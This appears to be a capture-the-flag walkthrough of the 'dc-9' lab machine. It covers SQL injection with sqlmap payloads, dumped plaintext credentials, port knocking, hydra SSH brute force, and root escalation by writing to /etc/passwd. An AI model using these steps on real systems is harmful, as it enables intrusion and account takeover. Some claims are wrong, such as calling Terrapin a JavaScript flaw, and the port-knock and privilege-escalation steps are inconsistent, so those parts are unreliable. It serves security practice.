PWN Using Port Knocking
Foot printing
nmap
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
Nuclei
"Apache/2.4.38 (Debian)" This is an outdated version. Along with "Vulnerable to Terrapin" which is a JS vulnerability. Which is odd considering I don’t see port 22 and I don’t see JS only PHP.
Re-running nmap with -Pn shows the port 22.
Very interesting to be hiding the SSH port hmmmm.
Web Page
From here we discover a SQLI vuln on the search functionality.
SqlMap
sqlmap -u "http://192.168.225.209:80/results.php" --dbms=mysql --level=5 --risk=3 --threads=10 --data="search=mary"
we get
---
Parameter: search (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=mary' AND 8722=8722-- Fakp
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=mary' AND (SELECT 3242 FROM (SELECT(SLEEP(5)))KpNU)-- KIKf
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=mary' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627871,0x51674c596f68454877516151695264574c49704975756372514e714245425657556562584e45577a,0x717a626b71),NULL,NULL,NULL-- -
---
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1 | marym@example.com | 46478415155456 | Moe | 2019-05-01 17:32:00 | Mary | CEO |
| 2 | julied@example.com | 46457131654 | Dooley | 2019-05-01 17:32:00 | Julie | Human Resources |
| 3 | fredf@example.com | 46415323 | Flintstone | 2019-05-01 17:32:00 | Fred | Systems Administrator |
| 4 | barneyr@example.com | 324643564 | Rubble | 2019-05-01 17:32:00 | Barney | Help Desk |
| 5 | tomc@example.com | 802438797 | Cat | 2019-05-01 17:32:00 | Tom | Driver |
| 6 | jerrym@example.com | 24342654756 | Mouse | 2019-05-01 17:32:00 | Jerry | Stores |
| 7 | wilmaf@example.com | 243457487 | Flintstone | 2019-05-01 17:32:00 | Wilma | Accounts |
| 8 | bettyr@example.com | 90239724378 | Rubble | 2019-05-01 17:32:00 | Betty | Junior Accounts |
| 9 | chandlerb@example.com | 189024789 | Bing | 2019-05-01 17:32:00 | Chandler | President - Sales |
| 10 | joeyt@example.com | 232131654 | Tribbiani | 2019-05-01 17:32:00 | Joey | Janitor |
| 11 | rachelg@example.com | 823897243978 | Green | 2019-05-01 17:32:00 | Rachel | Personal Assistant |
| 12 | rossg@example.com | 6549638203 | Geller | 2019-05-01 17:32:00 | Ross | Instructor |
| 13 | monicag@example.com | 8092432798 | Geller | 2019-05-01 17:32:00 | Monica | Marketing |
| 14 | phoebeb@example.com | 43289079824 | Buffay | 2019-05-01 17:32:02 | Phoebe | Assistant Janitor |
| 15 | scoots@example.com | 454786464 | McScoots | 2019-05-01 20:16:33 | Scooter | Resident Cat |
| 16 | janitor@example.com | 65464646479741 | Trump | 2019-12-23 03:11:39 | Donald | Replacement Janitor |
| 17 | janitor2@example.com | 47836546413 | Morrison | 2019-12-24 03:41:04 | Scott | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
Let’s try to attack this.
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin
SSH open with Port Knocking
open the PORTS
#!/bin/bash
# Define the sequence and ports
OPEN_SEQUENCE="7469 8475 9842"
CLOSE_SEQUENCE="9842 8475 7469"
SSH_PORT=22
# Function to open the port
open_port() {
IP=$1
sudo iptables -I INPUT -s "$IP" -p tcp --dport "$SSH_PORT" -j ACCEPT
}
# Function to close the port
close_port() {
IP=$1
sudo iptables -D INPUT -s "$IP" -p tcp --dport "$SSH_PORT" -j ACCEPT
}
# Function to knock the sequence
knock() {
IP=$1
SEQUENCE=$2
for port in $SEQUENCE; do
sudo hping3 -S -p "$port" -c 1 "$IP" >/dev/null 2>&1
sleep 0.5
done
}
# Check if the script is running with root privileges
if [ "$EUID" -ne 0 ]; then
echo "This script must be run as root"
exit 1
fi
# Get the IP address from user input
read -p "Enter the IP address: " IP
# Knock the open sequence and open the port
knock "$IP" "$OPEN_SEQUENCE"
open_port "$IP"
echo "Port $SSH_PORT opened for IP $IP"
# Wait for user input to close the port
read -p "Press Enter to close the port..."
# Knock the close sequence and close the port
knock "$IP" "$CLOSE_SEQUENCE"
close_port "$IP"
echo "Port $SSH_PORT closed for IP $IP"
Keep this running to keep the oprt open!
SSH Login
hydra -L usr.list -P pass.list ssh://192.168.191.209
We found
login: chandlerb password: UrAG0D!
login: joeyt password: Passw0rd
login: janitor password: Ilovepeepee
In the janitor user we found
janitor@dc-9:~$ ls -la
total 16
drwx------ 4 janitor janitor 4096 May 4 10:11 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 May 4 10:11 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin/ls
-bash: cd: .secrets-for-putin/ls: No such file or directory
janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$ exit
Let’s use hyrdra again with these passwords for teh admin fredf
22][ssh] host: 192.168.191.209 login: fredf password: B4-Tru3-001
User Flag
ssh fredf@192.168.191.209
fredf@192.168.191.209's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
fredf@dc-9:~$ ls
local.txt
fredf@dc-9:~$ cat local.txt
SECRET
fredf@dc-9:~$
PrivEsc
newuser:asutCwo2E2oVA:0:0:newuser:/root:/bin/bash
fredf@dc-9:~$ nano pass2
fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test pass2.txt /etc/passwd
fredf@dc-9:~$ su pwned
Password:
su: Authentication failure
fredf@dc-9:~$ su pwned
Password:
su: Authentication failure
fredf@dc-9:~$ su pwned
Password:
root@dc-9:/home/fredf# cd ../../
root@dc-9:/# ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
root@dc-9:/# cd root
root@dc-9:~# ls
proof.txt
root@dc-9:~# cat proof.txt
SECRET
root@dc-9:~#